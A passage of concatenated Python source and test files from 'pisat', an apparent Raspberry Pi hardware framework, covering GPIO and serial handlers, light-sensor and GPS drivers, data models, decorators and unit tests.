Period for sending, by default None
certain : Optional[bool], optional
If the transceiver sends data certainly, by default None
Notes
-----
If period is None, then the method uses the value of
CommSocket.period property as the parameter of period.
If the 'blocking' is False, then this method executes
the task of sending in another thread.
If certain is None, then the method uses the value of
CommSocket.certain property as the parameter of certain.
"""
self._send_stream.add(data)
self.flush(blocking=blocking, period=period, certain=certain)
```
#### File: core/logger/refque.py
```python
from threading import Lock
from collections import deque
from typing import Deque, Generic, Optional, TypeVar
from copy import deepcopy
from pisat.base.component import Component
from pisat.model.datamodel import DataModelBase
Model = TypeVar("Model")
class RefQueue(Component, Generic[Model]):
"""Queue with a lock.
This object is often used for retrieving data same as LogQueue
by DataLogger object. The object has syncronized data as LogQueue,
but smaller size than its size.
See Also
--------
pisat.core.logger.DataLogger : An operator of this object.
pisat.core.logger.LogQueue : Main container of data log.
"""
def __init__(self,
maxlen: int = 100,
name: Optional[str] = None) -> None:
"""
Parameters
----------
maxlen : int, optional
size of inner deque, by default 100.
name : Optional[str], optional
name of this component, by default None.
"""
super().__init__(name)
self._lock: Lock = Lock()
self._que: Deque[Model] = deque(maxlen=maxlen)
@property
def islocked(self) -> bool:
return self._lock.locked()
def get(self) -> Deque[Model]:
"""Get deep copy of inner deque in the way of thread safe.
Returns
-------
Deque[Dict[str, Logable]]
copy of inner deque.
"""
with self._lock:
que = deepcopy(self._que)
return que
def append(self, x: Model):
"""Append data into inner deque.
Parameters
----------
x : Dict[str, Logable]
data logged.
"""
with self._lock:
self._que.appendleft(x)
```
#### File: pisat/handler/digital_io_handler_base.py
```python
from typing import Optional
from pisat.handler.handler_base import HandlerBase
class DigitalIOHandlerBase(HandlerBase):
def __init__(self,
pin: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._pin: int = pin
@property
def pin(self):
return self._pin
```
#### File: pisat/handler/pigpio_digital_input_handler.py
```python
from typing import Optional
from pisat.util.platform import is_raspberry_pi
from pisat.handler.digital_input_handler_base import DigitalInputHandlerBase
if is_raspberry_pi():
import pigpio
class PigpioDigitalInputHandler(DigitalInputHandlerBase):
def __init__(self,
pi,
pin: int,
pullup: bool = False,
pulldown: bool = False,
name: Optional[str] = None) -> None:
self._pi: pigpio.pi = pi
self._pi.set_mode(pin, pigpio.INPUT)
super().__init__(pin, pullup=pullup, pulldown=pulldown, name=name)
def set_pull_up_down(self, pulldown: bool = False) -> None:
if pulldown:
self._pi.set_pull_up_down(self._pin, pigpio.PUD_DOWN)
else:
self._pi.set_pull_up_down(self._pin, pigpio.PUD_UP)
def clear_pull_up_down(self) -> None:
self._pi.set_pull_up_down(self._pin, pigpio.PUD_DOWN)
def observe(self) -> bool:
return bool(self._pi.read(self._pin))
```
#### File: pisat/handler/pyserial_serial_handler.py
```python
from typing import Optional, Tuple, Union
from enum import Enum
from serial import Serial
from pisat.handler.serial_handler_base import SerialHandlerBase
class PyserialSerialHandler(SerialHandlerBase):
class Baudrate(Enum):
RATE_50 = 50
RATE_75 = 75
RATE_110 = 110
RATE_134 = 134
RATE_150 = 150
RATE_200 = 200
RATE_300 = 300
RATE_600 = 600
RATE_1200 = 1200
RATE_1800 = 1800
RATE_2400 = 2400
RATE_4800 = 4800
RATE_9600 = 9600
RATE_19200 = 19200
RATE_38400 = 38400
RATE_57600 = 57600
RATE_115200 = 115200
RATE_230400 = 230400
RATE_460800 = 460800
RATE_500000 = 500000
RATE_576000 = 576000
RATE_921600 = 921600
RATE_1000000 = 1000000
RATE_1152000 = 1152000
RATE_1500000 = 1500000
RATE_2000000 = 2000000
RATE_2500000 = 2500000
RATE_3000000 = 3000000
RATE_3500000 = 3500000
RATE_4000000 = 4000000
@classmethod
def is_valid(cls, baudrate: int) -> bool:
for rate in cls:
if baudrate == rate.value:
return True
return False
def __init__(self,
port: str,
baudrate: int = 115200,
read_timeout: Optional[float] = None,
write_timeout: Optional[float] = None,
name: Optional[str] = None):
super().__init__(port, baudrate, name=name)
self._serial: Serial = Serial(port,
baudrate=baudrate,
timeout=read_timeout,
write_timeout=write_timeout)
@property
def counts_readable(self):
return self._serial.in_waiting
@property
def counts_writable(self):
return self._serial.out_waiting
def read(self, count: int) -> Tuple[int, bytes]:
if count < 0:
raise ValueError(
"'count' must be no less than 0."
)
res = self._serial.read(size=count)
return (len(res), res)
def write(self, data: Union[bytes, bytearray]) -> None:
self._serial.write(data)
def flush(self) -> None:
self._serial.flush()
```
#### File: pisat/handler/rpigpio_digital_input_handler.py
```python
from typing import Optional
from pisat.util.platform import is_raspberry_pi
from pisat.handler.digital_input_handler_base import DigitalInputHandlerBase
if is_raspberry_pi():
from RPi import GPIO
class RpiGpioDigitalInputHandler(DigitalInputHandlerBase):
def __init__(self,
pin: int,
pullup: bool = False,
pulldown: bool = False,
name: Optional[str] = None) -> None:
GPIO.setmode(GPIO.BCM)
super().__init__(pin, name=name)
# Setup default mode.
if not (pullup or pulldown):
GPIO.setup(pin, GPIO.IN)
def close(self) -> None:
GPIO.cleanup(self._pin)
def set_pull_up_down(self, pulldown: bool) -> None:
if pulldown:
GPIO.setup(self._pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
GPIO.setup(self._pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def clear_pull_up_down(self) -> None:
# TODO Find better way
GPIO.clean(self._pin)
GPIO.setup(self._pin, GPIO.IN)
def observe(self) -> bool:
return bool(GPIO.input(self._pin))
```
#### File: pisat/handler/serial_handler_base.py
```python
import time
from typing import Optional, Tuple, Union
from enum import Enum
from pisat.handler.handler_base import HandlerBase
class SerialHandlerBase(HandlerBase):
class Port(Enum):
USB_0 = "/dev/ttyUSB0"
USB_1 = "/dev/ttyUSB1"
USB_2 = "/dev/ttyUSB2"
USB_3 = "/dev/ttyUSB3"
UART = "/dev/serial0"
def __init__(self,
port: str,
baudrate: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._port: str = port
self._baudrate: int = baudrate
@property
def port(self):
return self._port
@property
def baudrate(self):
return self._baudrate
@property
def counts_readable(self):
pass
def close(self) -> None:
pass
def read(self, count: int) -> Tuple[int, bytes]:
pass
def readline(self, end: bytes = b'\n', timeout: float = 0.) -> bytes:
result = bytearray()
cursor = 0
tail = len(end)
time_last = - 1
while True:
if not self.counts_readable:
if time_last < 0:
time_last = time.time()
continue
if time.time() - time_last > timeout:
break
else:
continue
else:
time_last = - 1
count, char = self.read(1)
result.extend(char)
if ord(char) == end[cursor]:
cursor += 1
if cursor == tail:
break
else:
cursor = 0
return bytes(result)
def readlines(self, size: int = -1, end: bytes = b'\n') -> Tuple[bytes]:
result = []
if size < 0:
while True:
line = self.readline(end=end)
if not len(line):
break
result.append(line)
else:
for _ in range(size):
result.append(self.readline(end=end))
return result
def write(self, data: Union[bytes, bytearray]) -> None:
pass
```
#### File: pisat/handler/spi_handler_base.py
```python
from typing import Optional, Tuple, Union
from pisat.handler.handler_base import HandlerBase
class SPIHandlerBase(HandlerBase):
def __init__(self,
baudrate: int,
name: Optional[str] = None) -> None:
super().__init__(name=name)
self._baudrate = baudrate
@property
def baudrate(self):
return self._baudrate
def close(self) -> None:
pass
def read(self, count: int) -> Tuple[int, bytes]:
pass
def write(self, data: Union[bytes, bytearray]) -> None:
pass
def xfer(self, data: Union[bytes, bytearray]) -> Tuple[int, bytes]:
pass
```
#### File: pisat/model/linked_datamodel.py
```python
import inspect
from typing import Any, Dict, Generic, List, Optional, Tuple
from pisat.model.datamodel import (
loggable, DataModelBase, Loggable, Model, GetReturn
)
from pisat.util.deco import class_property
class linked_loggable(loggable, Generic[Model, GetReturn, Loggable]):
def __init__(self,
loggable: loggable,
publisher: str,
logging: bool = True,
default: Optional[Any] = None) -> None:
super().__init__(loggable._fget)
self._loggable = loggable
self._model = None
self._publisher = publisher
self._logging = logging
self._default = default
def __get__(self, obj: Any, clazz: Optional[type] = None):
if obj is None:
return self
if self._fget is not None:
if self._model is not None:
return self._fget(self._model)
else:
return self._default
def extract(self, model: Model, dname: str) -> Dict[str, Loggable]:
# Enable not to log the liked data.
if self._logging:
return super().extract(model, dname)
else:
return {}
@property
def publisher(self) -> str:
return self._publisher
def sync(self, model: DataModelBase) -> None:
self._model = model
class LinkedDataModelBase(DataModelBase):
_linked_loggables: List[Tuple[str, linked_loggable]]
_Pub2Link: Dict[str, List[linked_loggable]]
def __init_subclass__(cls) -> None:
super().__init_subclass__()
cls._linked_loggables = inspect.getmembers(cls, lambda x: isinstance(x, linked_loggable))
cls._Pub2Link = {}
for _, linked in cls._linked_loggables:
if cls._Pub2Link.get(linked.publisher) is None:
cls._Pub2Link[linked.publisher] = []
cls._Pub2Link[linked.publisher].append(linked)
@class_property
def linked_loggables(cls):
return cls._linked_loggables
def sync(self, *models: DataModelBase):
# NOTE If needless models are given, it works.
for model in models:
links = self._Pub2Link.get(model.publisher)
if links is not None:
for link in links:
link.sync(model)
```
#### File: pisat/sensor/apds9301.py
```python
import math
from typing import Optional, Tuple
from pisat.handler.i2c_handler_base import I2CHandlerBase
from pisat.model.datamodel import DataModelBase, loggable
from pisat.sensor.sensor_base import HandlerMismatchError, HandlerNotSetError
from pisat.sensor.sensor_base import SensorBase
class Apds9301(SensorBase):
ADDRESS_I2C_GND = 0x29
ADDRESS_I2C_FLOAT = 0x39
ADDRESS_I2C_VDD = 0x49
# - - - - - - - - - - - - - - - -
# NOTE
#
# 1. Each Registers are represented as compination of
# the bits of command fields and one of the bits
# of register address.
# - - - - - - - - - - - - - - - -
# BITS OF COMMAND FIELD
BITS_COMMAND_CMD = 0b10000000
BITS_COMMAND_CLEAR = 0b01000000
BITS_COMMAND_WORD = 0b00100000
# BITS OF RESISTOR ADDRESS
BITS_REG_CTRL = 0x0
BITS_REG_TIMING = 0x1
BITS_REG_THRESH_LOW_LOW = 0x2
BITS_REG_THRESH_LOW_HIGH = 0x3
BITS_REG_THRESH_HIGH_LOW = 0x4
BITS_REG_THRESH_HIGH_HIGH = 0x5
BITS_REG_INTERRUPT = 0x6
BITS_REG_ID = 0xA
BITS_REG_DATA0 = (0xC, 0xD)
BITS_REG_DATA1 = (0xE, 0xF)
# BITS ABOUT CONTROL REGISTER
BITS_POW_UP = 0x03
BITS_POW_DOWN = 0x00
# BITS ABOUT TIMING REGISTER
BITS_TIMING_GAIN_HIGH = 0b00010000
BITS_TIMING_GAIN_LOW = 0b00000000
BITS_TIMING_MANUAL_START = 0b00001000
BITS_TIMING_MANUAL_STOP = 0b00000000
BITS_TIMING_INTEGRATION_0 = 0b00000000
BITS_TIMING_INTEGRATION_1 = 0b00000001
BITS_TIMING_INTEGRATION_2 = 0b00000010
BITS_TIMING_INTEGRATION_MANUAL = 0b00000011
# BITS ABOUT INTERRUPT CONTROL REGISTER
BITS_INTR_LEVEL_DISABLED = 0b00000000
BITS_INTR_LEVEL_ENABLED = 0b00010000
# CONSTANT VALUES ABOUT REGISTORS
SIZE_BYTES_REG_DATA = 4
BITS_TIMING_INTEG_DEFAULT = BITS_TIMING_INTEGRATION_2
BITS_THRESHOLD_DEFAULT = 0x0000
THRESHOLD_MAX = 0xFFFF
THRESHOLD_MIN = 0x0000
PERSISTENCE_MAX = 0xF
PERSISTENCE_MIN = 0x0
ID_ON_DEBUG = -1
# - - - - - - - - - - - - - - - -
# OPTIONS
#
# * Gain
# value | mode
# -----------------------------
# 0 | high gain mode
# 1 | low gain mode
#
# * Manual Timing Control
# value | feature
# -----------------------------------------
# 0 | stop an integration cycle
# 1 | begin an integration cycle
# NOTE
# The Manual Timing Control option will work only when INTEG
# is set as 0x11.
#
# * INTEG
# value | nominal integration time
# -----------------------------------------
# 00 | 13.7 ms
# 01 | 101 ms
# 10 | 402 ms
# 11 | N/A
# - - - - - - - - - - - - - - - -
class DataModel(DataModelBase):
def setup(self, illum):
self._illum = illum
@loggable
def illuminance(self):
return self._illum
def __init__(self,
handler: I2CHandlerBase,
name: Optional[str] = None) -> None:
if not isinstance(handler, I2CHandlerBase):
raise HandlerMismatchError(
"'handler' must be HandlerI2C."
)
super().__init__(name)
self._handler: Optional[I2CHandlerBase] = handler
self._gain: int = self.BITS_TIMING_GAIN_LOW
self._manual: int = self.BITS_TIMING_MANUAL_STOP
self._integ: int = self.BITS_TIMING_INTEG_DEFAULT
self._id: int = self.ID_ON_DEBUG
self._threshold_low: int = self.BITS_THRESHOLD_DEFAULT
self._threshold_high: int = self.BITS_THRESHOLD_DEFAULT
self._level: int = self.BITS_INTR_LEVEL_DISABLED
self._persistence: int = 0
# setup device when a HandlerI2C is given.
self.power_up()
self._id: int = self._read_id()
def read(self):
ch0, ch1 = self._read_raw_data()
illum = self.calc_illum(ch0, ch1)
model = self.DataModel(self.name)
model.setup(illum)
return model
@classmethod
def calc_illum(cls, ch0, ch1) -> float:
p = ch1 / ch0
lux = 0.
if 0 < p <= 0.5:
lux = 0.0304 * ch0 - 0.062 * ch0 * math.pow(p, 1.4)
elif p <= 0.61:
lux = 0.0224 * ch0 - 0.031 * ch1
elif p <= 0.80:
lux = 0.0128 * ch0 - 0.0153 * ch1
elif p <= 1.30:
lux = 0.00146 * ch0 - 0.00112 * ch1
return lux
@property
def id(self):
return self._id
def power_up(self):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_CTRL,
self.BITS_POW_UP)
def power_down(self):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_CTRL,
self.BITS_POW_DOWN)
def set_timing(self,
highgain: Optional[bool] = None,
manual: Optional[bool] = None,
integ: Optional[int] = None):
self._check_handler()
if highgain is not None:
if isinstance(highgain, bool):
if highgain:
self._gain = self.BITS_TIMING_GAIN_HIGH
else:
self._gain = self.BITS_TIMING_GAIN_LOW
else:
raise TypeError(
"'highgain' must be bool."
)
if manual is not None:
if isinstance(manual, bool):
if manual:
self._manual = self.BITS_TIMING_MANUAL_START
else:
self._manual = self.BITS_TIMING_MANUAL_STOP
else:
raise TypeError(
"'manual' must be bool."
)
if integ is not None:
if self.BITS_TIMING_INTEGRATION_0 <= integ <= self.BITS_TIMING_INTEGRATION_MANUAL:
self._integ = integ
else:
raise ValueError(
"'integ' must be int and no less than 0 and no more than 3."
)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_TIMING,
self._gain | self._manual | self._integ)
def start_manual_integ(self):
self._check_handler()
self.set_timing(manual=True, integ=self.BITS_TIMING_INTEGRATION_MANUAL)
def stop_manual_integ(self):
self._check_handler()
self.set_timing(manual=False, integ=self.BITS_TIMING_INTEGRATION_MANUAL)
def clear_interrupt(self):
self._handler.read(self.BITS_COMMAND_CMD | self.BITS_COMMAND_CLEAR | self.BITS_REG_ID, 1)
def set_interrupt(self,
low: Optional[int] = None,
high: Optional[int] = None,
islevel: Optional[int] = None,
persistence: Optional[int] = None):
if low is not None:
if self.THRESHOLD_MIN <= low <= self.THRESHOLD_MIN:
self._threshold_low = low
lower = low & 0x00FF
upper = low & 0xFF00
self._set_threshold_low(lower, upper)
else:
raise ValueError(
"'low' must be int and in {} ~ {}"
.format(self.THRESHOLD_MIN, self.THRESHOLD_MAX)
)
if high is not None:
if self.THRESHOLD_MIN <= high <= self.THRESHOLD_MIN:
self._threshold_high = high
lower = high & 0x00FF
upper = high & 0xFF00
self._set_threshold_high(lower, upper)
else:
raise ValueError(
"'high' must be int and in {} ~ {}"
.format(self.THRESHOLD_MIN, self.THRESHOLD_MAX)
)
if islevel is not None:
if isinstance(islevel, bool):
if islevel:
self._level = self.BITS_INTR_LEVEL_ENABLED
else:
self._level = self.BITS_INTR_LEVEL_DISABLED
else:
raise TypeError(
"'islevel' must be bool."
)
if persistence is not None:
if self.PERSISTENCE_MIN <= persistence <= self.PERSISTENCE_MAX:
self._persistence = persistence
else:
raise ValueError(
"'persistance' must be int and in {} ~ {}"
.format(self.PERSISTENCE_MIN, self.PERSISTENCE_MAX)
)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_INTERRUPT,
self._level | self._persistence)
def _check_handler(self):
if self._handler is None:
raise HandlerNotSetError(
"A hanlder must be set for executing this method."
)
def _read_raw_data(self) -> Tuple[int]:
_, raw = self._handler.read(self.BITS_COMMAND_CMD | self.BITS_REG_DATA0[0],
self.SIZE_BYTES_REG_DATA)
return (raw[1] << 8 | raw[0], raw[3] << 8 | raw[2])
def _read_id(self) -> int:
_, raw = self._handler.read(self.BITS_COMMAND_CMD | self.BITS_REG_ID, 1)
return raw[0]
def _set_threshold_low(self, lower: int, upper: int):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_LOW_LOW, lower)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_LOW_HIGH, upper)
def _set_threshold_high(self, lower: int, upper: int):
self._check_handler()
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_HIGH_LOW, lower)
self._handler.write(self.BITS_COMMAND_CMD | self.BITS_REG_THRESH_HIGH_HIGH, upper)
```
#### File: pisat/sensor/sam_m8q.py
```python
from typing import Optional, Tuple, Union
from pisat.handler.i2c_handler_base import I2CHandlerBase
from pisat.handler.serial_handler_base import SerialHandlerBase
from pisat.model.datamodel import DataModelBase, loggable
from pisat.sensor.sensor_base import HandlerMismatchError, SensorBase
from pisat.sensor.serial_gps import SerialGPS
class UARTSamM8Q(SerialGPS):
pass
# TODO I2C ver.
class I2CSamM8Q(SensorBase):
pass
# TODO I2C ver.
class SamM8Q(SensorBase):
class DataModel(DataModelBase):
def setup(self,
time_utc: Optional[Tuple[Union[int, float]]] = None,
latitude: Optional[float] = None,
longitude: Optional[float] = None,
altitude: Optional[float] = None):
self._time_utc = time_utc
self._latitude = latitude
self._longitude = longitude
self._altitude = altitude
@loggable
def time_utc(self):
return self._time_utc
@time_utc.formatter
def time_utc(self):
name = self.get_tag("time_utc")
value = None
if self._time_utc is not None:
value = f"{self._time_utc[0]}:{self._time_utc[1]}:{self._time_utc[2]}"
return {name: value}
@loggable
def latitude(self):
return self._latitude
@loggable
def longitude(self):
return self._longitude
@loggable
def altitude(self):
return self._altitude
def __init__(self,
handler: Union[I2CHandlerBase, SerialHandlerBase],
name: Optional[str] = None) -> None:
super().__init__(name=name)
if isinstance(handler, SerialHandlerBase):
self._base = UARTSamM8Q(handler=handler)
elif isinstance(handler, I2CHandlerBase):
self._base = I2CSamM8Q(handler=handler)
else:
raise HandlerMismatchError(
"'handler' must be for UART or I2C."
)
self._handler = handler
def read(self):
return self._base.read()
```
#### File: tester/core/node_tester.py
```python
from typing import Any, Dict, Optional, Sequence, Tuple, Type
from pisat.tester.tester_base import Tester
from pisat.tester.core.util import simulate_judge_from, simulate_judge_from_all
from pisat.core.nav.node import Node
from pisat.core.nav.post_event import PostEvent
from pisat.core.manager.component_manager import ComponentManager
from pisat.core.logger.datalogger import DataLogger
class InappropriateDestinationError(Exception):
"""Raised if inappropriate destination of Node is found."""
pass
class NodeTester(Tester):
def __init__(self,
node: Type[Node],
manager: ComponentManager,
my_flag: Optional[Any] = None,
dlogger: Optional[DataLogger] = None) -> None:
self._node: Type[Node] = node
self._manager: ComponentManager = manager
self._my_flag = my_flag
self._dlogger: Optional[DataLogger] = dlogger
self._event: PostEvent = PostEvent()
self._current: Optional[Node] = None
def setup(self, manager: Optional[ComponentManager] = None):
if manager is not None:
self._manager = manager
self._event.clear()
self._current = self._node(self._manager, self._event)
self._current.enter()
def simulate_judge(self,
data,
manager: Optional[ComponentManager] = None) -> int:
"""Simulate Node.judge callback from given data and find the index
on which a flag is detected.
This method executes the judge callback of the internal Node with
given data and returns the result as the index on which an internal
flag is triggered. If any flags are not triggered, then the method
returns -1, and if the flag to myself is not given at initialization,
then this method always returns 0.
Parameters
----------
data : Sequence[Dict[str, Logable]]
Data for simulating
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
int
The index on which an internal flag is triggered.
"""
if self._my_flag is None:
return 0
self.setup(manager=manager)
for i, d in enumerate(data):
judged = self._current.judge(d)
if judged != self._my_flag:
return i
else:
return -1
def simulate_judge_all(self,
data,
manager: Optional[ComponentManager] = None) -> Tuple[Any]:
"""Simulate Node.judge callback by feeding given all data.
This method executes the judge callback of the internal Node with
given data and collects the results of the judge callback.
Parameters
----------
data : Sequence[Dict[str, Logable]]
Data for simulating
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
Tuple[Any]
Returned results from the judge callback.
"""
self.setup(manager=manager)
result = []
for d in data:
result.append(self._current.judge(d))
return tuple(result)
def simulate_judge_from(self,
path: str,
dnames: Optional[Sequence[str]] = None,
manager: Optional[ComponentManager] = None) -> int:
"""Simulate Node.judge callback with given data file and find the index
on which a flag is detected.
This method executes the judge callback of the internal Node with
data in given file and returns the result as the index on which an internal
flag is triggered. If any flags are not triggered, then the method
returns -1, and if the flag to myself is not given at initialization,
then this method always returns 0.
Parameters
----------
path : str
Path of a csv file.
dnames : Optional[Sequence[str]], optional
Data names if the csv file doesn't have them, by default None
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
int
The index on which an internal flag is triggered.
Raises
------
ValueError
path must reprents path of a csv file.
"""
self.setup(manager=manager)
try:
return simulate_judge_from(self._current.judge, self._my_flag, path, dnames=dnames)
except ValueError:
return 0
def simulate_judge_from_all(self,
path: str,
dnames: Optional[Sequence[str]] = None,
manager: Optional[ComponentManager] = None) -> Tuple[Any]:
"""Simulate Node.judge callback by feeding all data from given file.
This method executes the judge callback of the internal Node with
data in given file and collects the results of the judge callback.
Parameters
----------
path : str
Path of a csv file.
dname : Optional[Sequence[str]], optional
Data names if the csv file doesn't have them, by default None
manager : Optional[ComponentManager], optional
ComponentManager if needed to update, by default None
Returns
-------
Tuple[Any]
Returned results from the judge callback.
Raises
------
ValueError
path must reprents path of a csv file.
"""
self.setup(manager=manager)
return simulate_judge_from_all(self._current.judge, path, dnames=dnames)
```
#### File: pisat/util/deco.py
```python
from typing import Callable, Generic, Optional, Type, TypeVar, Union
def restricted_setter(*args):
if not len(args):
raise ValueError(
"This method needs 1 or more arguments."
)
def wrapper(func):
def setter(self, val):
str_args = tuple(map(str, args))
if len(str_args) > 1:
formatted = [", ".join(str_args[:-1]), str_args[-1]]
formatted = " or ".join(formatted)
else:
formatted = str_args[0]
if val not in args:
raise ValueError(
f"'{func.__name__}' must be {formatted}."
)
return func(self, val)
return setter
return wrapper
def restricted_range_setter(inf: Union[int, float],
sup: Union[int, float],
ismin: bool = True,
ismax: bool = True):
def wrapper(func):
def format_range(ismin: bool, ismax: bool) -> str:
lower = "<=" if ismin else "<"
upper = "<=" if ismax else "<"
return f"{inf} {lower} {func.__name__} {upper} {sup}"
def setter(self, val: Union[int, float]):
condition = None
if ismin:
if ismax:
condition = inf <= val <= sup
else:
condition = inf <= val < sup
else:
if ismax:
condition = inf < val <= sup
else:
condition = inf < val < sup
if not condition:
raise ValueError(
f"'{func.__name__}' must be {format_range(ismin, ismax)}"
)
return func(self, val)
return setter
return wrapper
Object = TypeVar("Object")
ReturnGetter = TypeVar("ReturnGetter")
class class_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if clazz is None:
clazz = type(obj)
if self._fget is not None:
return self._fget(clazz)
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
class cached_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if obj is None:
return self
if self._fget is not None:
value = self._fget(obj)
obj.__dict__[self._fget.__name__] = value
return value
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
class cached_class_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
self._result: Union[ReturnGetter, None] = None
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if clazz is None:
clazz = type(obj)
if self._fget is not None:
if self._result is None:
self._result = self._fget(clazz)
return self._result
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
```
#### File: sample/counter/test_node1.py
```python
from pisat.core.nav import Node
class TestNode1(Node):
def enter(self):
self.counter = self.manager.get_component("counter")
def judge(self, data) -> bool:
self.counter.increment()
if self.counter.count > 5:
return True
else:
return False
```
#### File: sample/counter/test_node2.py
```python
from pisat.core.nav import Node
class TestNode2(Node):
def enter(self):
self.counter = self.manager.ger_component("counter")
def judge(self, data) -> bool:
if self.counter.count > 5:
print("Good")
self.counter.reset()
self.counter.increment()
if self.counter.count > 2:
return True
else:
return False
```
#### File: core/nav/test_node_context.py
```python
import random
import unittest
from pisat.core.logger import SensorController
from pisat.core.nav import Node, Context
from pisat.model import cached_loggable, LinkedDataModelBase, linked_loggable
from pisat.sensor import NumberGenerator
NAME_NUMBERGENERATOR = "numgen"
class LinkedDataModel(LinkedDataModelBase):
num = linked_loggable(NumberGenerator.DataModel.num, NAME_NUMBERGENERATOR)
@cached_loggable
def num_sqrt(self):
return self.num ** 2
class TestNode1(Node):
model = LinkedDataModel
def judge(self, data: LinkedDataModel) -> bool:
print(f"TestNode1 num_sqrt: {data.num_sqrt}")
if data.num_sqrt < 0.5:
return True
else:
return False
class TestNode2(Node):
model = LinkedDataModel
def judge(self, data: LinkedDataModel) -> bool:
print(f"TestNode2 num_sqrt: {data.num_sqrt}")
if data.num_sqrt > 0.5:
return True
else:
return False
class TestNodeContext(unittest.TestCase):
def setUp(self) -> None:
self.context = Context({TestNode1: {True: TestNode2, False: TestNode1},
TestNode2: {True: None, False: TestNode2}},
start=TestNode1)
numgen = NumberGenerator(random.random, name=NAME_NUMBERGENERATOR)
self.sencon = SensorController(modelclass=LinkedDataModel, name="sencon")
self.sencon.append(numgen)
def test_flow(self):
node = self.context.start(None, None)
while True:
data = self.sencon.read()
result = node.judge(data)
next = self.context.next(result)
if next is None:
break
if next != node.__class__:
print(f"{node.__class__.__name__} detected: {result}")
node = next(None, None)
if __name__ == "__main__":
unittest.main()
```
#### File: core/nav/test_post_event.py
```python
import threading
import time
from pisat.core.nav import PostEvent
pevent = PostEvent()
def test():
print("start thread")
while not pevent.wait(2):
print("waiting...")
print(pevent.package)
print("close thread")
thread = threading.Thread(target=test)
thread.start()
time.sleep(5)
print("event occured")
pevent.set("good")
```
#### File: tests/sensor/test_bno055.py
```python
import time
import unittest
import pigpio
from pisat.handler import PigpioI2CHandler
from pisat.sensor import Bno055
from pisat.tester.sensor import SensorTestor
ADDRESS_BNO055 = 0x28
class TestBNO055(unittest.TestCase):
def setUp(self) -> None:
pi = pigpio.pi()
handler = PigpioI2CHandler(pi, ADDRESS_BNO055)
self.bno055 = Bno055(handler, name="bno055")
self.bno055.change_operation_mode(Bno055.OperationMode.NDOF)
self.testor = SensorTestor(self.bno055)
def test_bench_mark(self):
result = self.testor.exec_benchmark()
print(f"time to read 100 times: {result}")
def test_remap(self):
print("Current Axis Map")
print("----------------")
print(f"x: {self.bno055.axis_x}, sign: {self.bno055.sign_x}")
print(f"y: {self.bno055.axis_y}, sign: {self.bno055.sign_y}")
print(f"z: {self.bno055.axis_z}, sign: {self.bno055.sign_z}")
print()
self.bno055.remap_axis(self.bno055.Axis.Y, self.bno055.Axis.X, self.bno055.Axis.Z)
self.bno055.remap_sign(x=self.bno055.AxisSign.NEGATIVE)
print("Axes remapped.", end="\n\n")
self.bno055._read_map_config()
self.bno055._read_map_sign()
print("New Axis Map")
print("----------------")
print(f"x: {self.bno055.axis_x}, sign: {self.bno055.sign_x}")
print(f"y: {self.bno055.axis_y}, sign: {self.bno055.sign_y}")
print(f"z: {self.bno055.axis_z}, sign: {self.bno055.sign_z}")
print()
# reset
self.bno055.reset_axis()
self.bno055.reset_sign()
def test_calibration(self):
print()
print("Calibration status")
print("------------------")
self.bno055.load_calib_stat()
print(f"sys: {self.bno055.calib_stat_sys}")
print(f"acc: {self.bno055.calib_stat_acc}")
print(f"mag: {self.bno055.calib_stat_mag}")
print(f"gyro: {self.bno055.calib_stat_gyro}")
def test_observe(self):
self.bno055.remap_axis(self.bno055.Axis.Y, self.bno055.Axis.X, self.bno055.Axis.Z)
self.bno055.remap_sign(z=self.bno055.AxisSign.NEGATIVE)
self.testor.observe()
if __name__ == "__main__":
unittest.main()
```
#### File: tests/sensor/test_number_generator.py
```python
import random
import unittest
from pisat.sensor.number_generator import NumberGenerator
class TestNumberGenerator(unittest.TestCase):
def setUp(self) -> None:
fun1 = lambda: random.uniform(0, 10)
self.numgen1 = NumberGenerator(fun1, name="numgen1")
def test_read(self):
print(self.numgen1.read().extract())
if __name__ == "__main__":
unittest.main()
```
#### File: tests/sensor/test_opt3002.py
```python
import unittest
import pigpio
from pisat.handler import PigpioI2CHandler
from pisat.sensor import Opt3002
from pisat.tester.sensor import SensorTestor
ADDRESS_OPT3002 = 0x68
class TestOPT3002(unittest.TestCase):
def setUp(self) -> None:
pi = pigpio.pi()
handler = PigpioI2CHandler(pi, ADDRESS_OPT3002)
self.opt3002 = Opt3002(handler, name="apds9301")
self.testor = SensorTestor(self.opt3002)
def test_observe(self):
self.testor.print_data()
def test_bench_mark(self):
result = self.testor.exec_benchmark(show=True)
print(f"time to read 100 times: {result}")
if __name__ == "__main__":
unittest.main()
``` |
{
